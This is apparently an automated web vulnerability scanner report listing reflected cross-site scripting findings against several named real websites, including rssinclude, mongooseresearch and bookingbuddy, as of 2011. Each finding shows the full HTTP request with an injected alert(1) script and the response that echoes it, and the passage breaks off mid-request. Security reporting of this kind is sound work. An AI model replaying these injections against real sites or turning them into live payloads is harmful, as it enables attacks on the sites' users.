1.10. http://output39.rssinclude.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cf735<script>alert(1)</script>ea66228af3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocf735<script>alert(1)</script>ea66228af3f HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:03:05 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 243
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/favicon.icocf735<script>alert(1)</script>ea66228af3f" was not found on this server.</p>
...[SNIP]...

1.11. http://output39.rssinclude.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab1e4<script>alert(1)</script>4ae4528ce59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ab1e4<script>alert(1)</script>4ae4528ce59=1 HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:03:00 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 246
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/favicon.ico?ab1e4<script>alert(1)</script>4ae4528ce59=1" was not found on this server.</p>
...[SNIP]...

1.12. http://output39.rssinclude.com/output [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/output

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52c19<script>alert(1)</script>dac761c580a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /output52c19<script>alert(1)</script>dac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565 HTTP/1.1
Host: output39.rssinclude.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cosmos.champlain.edu/library/
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 21:11:06 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Set-Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 294
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/output52c19<script>alert(1)</script>dac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565" was not found on this server.</p>
...[SNIP]...

1.13. http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 207eb<script>alert(1)</script>93ab3e6d042 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /output52c19%3Cscript%3Ealert(1)%3C207eb<script>alert(1)</script>93ab3e6d042/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565 HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:03:15 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/output52c19%3Cscript%3Ealert(1)%3C207eb<script>alert(1)</script>93ab3e6d042/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565" was not found on this server.</p>
...[SNIP]...

1.14. http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3204b<script>alert(1)</script>8e18c9409d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a3204b<script>alert(1)</script>8e18c9409d6?type=js&id=257164&hash=285b3d37b916df171213430b6d484565 HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:03:17 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a3204b<script>alert(1)</script>8e18c9409d6?type=js&id=257164&hash=285b3d37b916df171213430b6d484565" was not found on this server.</p>
...[SNIP]...

1.15. http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a [hash parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a

Issue detail

The value of the hash request parameter is copied into the HTML document as plain text between tags. The payload 73188<script>alert(1)</script>297f53218e0 was submitted in the hash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d48456573188<script>alert(1)</script>297f53218e0 HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:03:02 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d48456573188<script>alert(1)</script>297f53218e0" was not found on this server.</p>
...[SNIP]...

1.16. http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 6763b<script>alert(1)</script>157cfd9346c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=2571646763b<script>alert(1)</script>157cfd9346c&hash=285b3d37b916df171213430b6d484565 HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:03:00 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=2571646763b<script>alert(1)</script>157cfd9346c&hash=285b3d37b916df171213430b6d484565" was not found on this server.</p>
...[SNIP]...

1.17. http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3a67<script>alert(1)</script>4fe985fb526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565&e3a67<script>alert(1)</script>4fe985fb526=1 HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:03:10 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565&e3a67<script>alert(1)</script>4fe985fb526=1" was not found on this server.</p>
...[SNIP]...

1.18. http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://output39.rssinclude.com
Path:	/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload b8fc5<script>alert(1)</script>b1ef89fb995 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=jsb8fc5<script>alert(1)</script>b1ef89fb995&id=257164&hash=285b3d37b916df171213430b6d484565 HTTP/1.1
Host: output39.rssinclude.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://output39.rssinclude.com/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=js&id=257164&hash=285b3d37b916df171213430b6d484565
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2uh80bhau2hfu8jjicvsbhr04
Content-Length: 10

Response

HTTP/1.1 404 Not Found
Date: Sun, 25 Dec 2011 22:02:58 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3-7+squeeze3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL "/output52c19%3Cscript%3Ealert(1)%3C/script%3Edac761c580a?type=jsb8fc5<script>alert(1)</script>b1ef89fb995&id=257164&hash=285b3d37b916df171213430b6d484565" was not found on this server.</p>
...[SNIP]...

1.19. http://platform.mongooseresearch.com/Client/mg-connect.js.aspx [comm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://platform.mongooseresearch.com
Path:	/Client/mg-connect.js.aspx

Issue detail

The value of the comm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6998"%3balert(1)//5a341605cd4 was submitted in the comm parameter. This input was echoed as b6998";alert(1)//5a341605cd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Client/mg-connect.js.aspx?comm=http://www.champlain.edu/Documents/mg-comm.htmlb6998"%3balert(1)//5a341605cd4&id=7a9a9a34-dc3d-4875-9a5e-1bc26666bb38&s=Web HTTP/1.1
Host: platform.mongooseresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://www.champlain.edu/undergraduate-studies/admission/request-more-information.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 10

Response

HTTP/1.1 200 OK
Date: Sun, 25 Dec 2011 21:00:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5270

document.write('<script type="text/javascript" src="http://platform.mongooseresearch.com/Client/jquery-1.3.2.min.js"></script>');
document.write('<script type="text/javascript" src="http://platform
...[SNIP]...
</iframe>');
       requestFrame.attr('src', frameUrl+"7a9a9a34-dc3d-4875-9a5e-1bc26666bb38?comm=http://www.champlain.edu/Documents/mg-comm.htmlb6998";alert(1)//5a341605cd4");
       jQuery('#mg-connect-request').append(requestFrame);
   }
};

mongoose.ready(function(){
   if(document.getElementById('mg-connect')) {
       mongoose.setupMobileNumber();
   }
   if(document.getElem
...[SNIP]...

1.20. http://platform.mongooseresearch.com/Client/mg-connect.js.aspx [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://platform.mongooseresearch.com
Path:	/Client/mg-connect.js.aspx

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9e4'%3balert(1)//c2d4b6fcfa4 was submitted in the s parameter. This input was echoed as dd9e4';alert(1)//c2d4b6fcfa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Client/mg-connect.js.aspx?comm=http://www.champlain.edu/Documents/mg-comm.html&id=7a9a9a34-dc3d-4875-9a5e-1bc26666bb38&s=Webdd9e4'%3balert(1)//c2d4b6fcfa4 HTTP/1.1
Host: platform.mongooseresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7
Accept: */*
Referer: http://www.champlain.edu/undergraduate-studies/admission/request-more-information.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 10

Response

HTTP/1.1 200 OK
Date: Sun, 25 Dec 2011 21:00:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5242

document.write('<script type="text/javascript" src="http://platform.mongooseresearch.com/Client/jquery-1.3.2.min.js"></script>');
document.write('<script type="text/javascript" src="http://platform
...[SNIP]...

               jQuery('#mg-number').val('');
           }

           jQuery('#mg-fb-trigger').attr('href', frameSource + '?o=7a9a9a34-dc3d-4875-9a5e-1bc26666bb38&comm=http://www.champlain.edu/Documents/mg-comm.html&s=Webdd9e4';alert(1)//c2d4b6fcfa4&m='+jQuery('#mg-number').val());

           if(validPhone(jQuery('#mg-number').val())){

               jQuery('#mg-fb-trigger').trigger('click');
               jQuery('#mg-number').val('');
               jQuery('.mg-error').
...[SNIP]...

1.21. http://www.bookingbuddy.com/ad_wrapper.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bookingbuddy.com
Path:	/ad_wrapper.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7233'%3balert(1)//87caaad782e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7233';alert(1)//87caaad782e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad_wrapper.php?width=300&height=250&request=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fta.bb.com%2Fair%3Baco%3Dunited_states%3Bast%3Dwashington%3Bact%3Dseattle%3Baap%3Dsea%3Boap%3Dsea%3Bawr%3Dnorth_america%3Boct%3Dseattle%3Bptag%3Dair_s%3Boco%3Dunited_states%3Bowr%3Dnorth_america%3Bost%3Dwashington%3Bu%3D%7C%7C%7Cair%7Cnorth_america%7Cunited_states%7Cwashington%7Cseattle%7Cnorth_america%7Cunited_states%7Cwashington%7Cseattle%7C%3Bdcopt%3Dist%3Bsz%3D300x250%2C250x250%3Btile%3D1%3Bord%3D120161632/f7233'%3balert(1)//87caaad782e2%3B HTTP/1.1
Host: www.bookingbuddy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bookingbuddy.com/tabsearches.php?search_mode=air&ctm=B1A1&source=bbs_farecast_flights_HP_unchecked-box-a_001&departure_city=WAS&departure_month=01+2012&departure_day=20&arrival_city=SEA&return_month=01+2012&return_day=22&search_type=roundtrip&num_travelers=1
Cookie: uu=dacf7498-51d7-4f6e-bb25-12ebd1f1b26e; referrer=5031%3A%3A%3A%3A%3A%3A1324861527%3A%3A%3A%3A%3A%3Abbs_farecast_flights_HP_unchecked-box-a_001; ssource=%7B%22id%22%3A5031%2C%22unique_name%22%3A%22bbs_farecast_flights_HP_unchecked-box-a_001%22%2C%22type%22%3A%22traq%22%2C%22marketing_partner%22%3A%22bing_travel_farecast%22%7D; cstream=mcid%3A%3A13285%7C%7C%7Cttl%3A%3A1325466327; pb_bb_ab_bbs_2618=c0f0bfe4d5e58f8777d154e6095d14c6a%3A1%3A%7Bs%3A14%3A%22bb_ab_bbs_2618%22%3Bs%3A12%3A%22bbs_2618_new%22%3B%7D; BBP_Ads=%7B%22pop%22%3Anull%2C%22tab%22%3A%5B%5D%7D; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22WAS%22%2C%22c2%22%3A%22SEA%22%2C%22st%22%3A%22roundtrip%22%2C%22ntrv%22%3A%221%22%2C%22d1%22%3A1327039200000%2C%22d2%22%3A1327212000000%2C%22ns%22%3A%22%22%2C%22t1%22%3A%22anytime%22%2C%22t2%22%3A%22anytime%22%2C%22sc%22%3A%22economy_coach%22%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%2C%22holiday%22%3A%5B%5D%7D%7D; criteo_data=01/20/201201/22/2012WASSEA5031; entry_time=time; last_visited=1324861550908; last_visited_sent=1; vss_mode=["air"]; s_cc=true; e_Var22=eVar22; s_p1_s_campaign=5031; s_p1_s_eVar7=5031; s_p1_s_eVar9=5031; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|277BE42F05162E54-600001988036EB7C[CE]; vid=4ef7c8603bb049.25542662
Content-Length: 10

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Date: Mon, 26 Dec 2011 01:06:41 GMT
Content-Length: 1977
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
united_states;owr=north_america;ost=washington;u=|||air|north_america|united_states|washington|seattle|north_america|united_states|washington|seattle|;dcopt=ist;sz=300x250,250x250;tile=1;ord=120161632/f7233';alert(1)//87caaad782e2;" type="text/javascript">
...[SNIP]...

1.22. http://www.bookingbuddy.com/ad_wrapper.php [request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bookingbuddy.com
Path:	/ad_wrapper.php

Issue detail

The value of the request request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4f62'%3balert(1)//5efa129e83 was submitted in the request parameter. This input was echoed as b4f62';alert(1)//5efa129e83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad_wrapper.php?width=300&height=250&request=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fta.bb.com%2Fair%3Baco%3Dunited_states%3Bast%3Dwashington%3Bact%3Dseattle%3Baap%3Dsea%3Boap%3Dsea%3Bawr%3Dnorth_america%3Boct%3Dseattle%3Bptag%3Dair_s%3Boco%3Dunited_states%3Bowr%3Dnorth_america%3Bost%3Dwashington%3Bu%3D%7C%7C%7Cair%7Cnorth_america%7Cunited_states%7Cwashington%7Cseattle%7Cnorth_america%7Cunited_states%7Cwashington%7Cseattle%7C%3Bdcopt%3Dist%3Bsz%3D300x250%2C250x250%3Btile%3D1%3Bord%3D1201616322%3Bb4f62'%3balert(1)//5efa129e83 HTTP/1.1
Host: www.bookingbuddy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bookingbuddy.com/tabsearches.php?search_mode=air&ctm=B1A1&source=bbs_farecast_flights_HP_unchecked-box-a_001&departure_city=WAS&departure_month=01+2012&departure_day=20&arrival_city=SEA&return_month=01+2012&return_day=22&search_type=roundtrip&num_travelers=1
